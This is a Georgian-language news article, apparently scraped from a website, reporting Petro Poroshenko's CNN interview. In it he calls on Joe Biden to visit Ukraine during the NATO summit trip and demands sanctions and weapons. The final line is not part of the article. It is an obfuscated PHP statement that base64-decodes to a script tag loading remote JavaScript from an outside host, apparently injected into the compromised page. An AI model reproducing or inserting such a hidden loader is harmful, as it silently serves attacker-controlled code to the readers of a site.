celsiusi
ავერსი საქკაბელი
უკრაინის ყოფილმა პრეზიდენტმა პეტრო პოროშენკომ განაცხადა, რომ შეერთებული შტატების პრეზიდენტი ჯო ბაიდენი მომავალ კვირას ბრიუსელში დაგეგმილი ნატო-ს სამიტის ფარგლებში ევროპაში ვიზიტისას, უკრაინას უნდა ეწვიოს, - ამის შესახებ ინფორმაციას CNN-ი ავრცელებს.
 
უკრაინის ყოფილმა პრეზიდენტმა, აღნიშნა, რომ რუსეთის პრეზიდენტი ვლადიმერ პუტინი "გიჟი მანიაკია".
 
„რატომაც არა - ჩემი ძალიან კარგი მეგობარი, უკრაინის ძალიან კარგი მეგობარი, ჯო ბაიდენი, გლობალური მსოფლიოს ლიდერი, რომელიც ახლა აჩვენებენ ლიდერობას - რატომ არ მოვა აქ მომავალ კვირას, როგორც ჩვენდამი სოლიდარობის სიმბოლო? ეს იქნება უკიდურესად სწორი ნაბიჯი იმის სადემონსტრაციოდ, რომ მთელი მსოფლიო ჩვენთან ერთად არის რუსეთის წინააღმდეგ.
 
ჩვენ არ ვიბრძვით მხოლოდ უკრაინის მიწისთვის. ჩვენ ვიბრძვით ევროპის უსაფრთხოებისთვის, თავისუფლებისთვის, დემოკრატიისთვის და გლობალური უსაფრთხოებისთვის. ასევე თქვენთვის, შეერთებული შტატებისთვის. ჩემი თხოვნაა, დაგვეხმარეთ მსოფლიოს გადარჩენაში. დაგვეხმარეთ გადავარჩინოთ ევროპა. დაგვეხმარეთ, რომ გადაგარჩინოთ თქვენ." - განუცხადა პეტრო პოროშენკომ CNN-ის ჟურნალისტს.
 
ინტერვიუში, პოროშენკო რუსეთის წინააღმდეგ სანქციების გაძლიერების მოწოდებითაც გამოვიდა და უკრაინისთვის იარაღის მიწოდების გაძლიერებაც მოითხოვა. მან, ასევე, ხაზგასმით აღნიშნა, რომ უკრაინელებს აქვთ "ტყვიაგაუმტარი ერთიანობა". 
 
შეგახსენებთ, რომ თეთრი სახლის ცნობით, პრეზიდენტი ჯო ბაიდენი ბრიუსელში 24 მარტს დაგეგმილ ნატო-ს სამიტში მონაწილეობის მისაღებად გაემგზავრება და ასევე დაესწრება ევროპული საბჭოს სხდომას.
 
 
 
999
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");